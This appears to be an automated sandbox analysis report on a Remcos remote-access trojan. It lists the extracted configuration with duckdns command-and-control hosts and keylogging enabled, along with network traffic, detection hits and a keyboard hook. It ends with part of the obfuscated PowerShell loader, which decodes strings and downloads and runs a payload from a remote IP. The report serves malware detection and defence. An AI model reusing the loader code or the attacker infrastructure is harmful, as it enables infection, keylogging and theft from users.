Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://geoplugin.net/json.gp |
URL Reputation: Label: phishing |
Source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "jgbours284hawara01.duckdns.org:3050:0jgbours284hawara01.duckdns.org:3051:1jgbours284hawara02.duckdns.org:3050:0", "Assigned name": "Protected", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "jnbcourg-8XH6PE", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "mvourhjs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: jgbours284hawara01.duckdns.org |
Virustotal: Detection: 6% |
Perma Link |
Source: jgbours284hawara01.duckdns.org |
Virustotal: Detection: 6% |
Perma Link |
Source: http://87.121.105.163 |
Virustotal: Detection: 17% |
Perma Link |
Source: http://87.121.105.163/Belyves242.hhk |
Virustotal: Detection: 15% |
Perma Link |
Source: Yara match |
File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR |
Source: Yara match |
File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Traffic |
Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49720 -> 45.88.90.110:3050 |
Source: Traffic |
Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 45.88.90.110:3050 -> 192.168.2.6:49720 |
Source: Malware configuration extractor |
URLs: jgbours284hawara01.duckdns.org |
Source: unknown |
DNS query: name: jgbours284hawara01.duckdns.org |
Source: global traffic |
TCP traffic: 192.168.2.6:49720 -> 45.88.90.110:3050 |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: Joe Sandbox View |
IP Address: 87.121.105.163 87.121.105.163 |
Source: Joe Sandbox View |
IP Address: 178.237.33.50 178.237.33.50 |
Source: Joe Sandbox View |
ASN Name: LVLT-10753US LVLT-10753US |
Source: global traffic |
HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 87.121.105.163 |
Source: global traffic |
HTTP traffic detected: GET /Belyves242.hhk HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /DtExZZndAxdvvlCKCcIVF127.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.163Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache |
Source: unknown |
DNS traffic detected: queries for: jgbours284hawara01.duckdns.org |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163 |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Belyves242.hhkP |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/Belyves242.hhkXR |
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bin |
Source: wab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.bi |
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPv |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.bini |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binm |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://87.121.H |
Source: wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/ |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gp |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpg |
Source: wab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://geoplugin.net/json.gpw |
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe |
Jump to behavior |
Source: Yara match |
File source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR |
Source: Yara match |
File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED |
Source: amsi32_1492.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6256, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 5596 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 5596 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 5596 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 5596 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaa |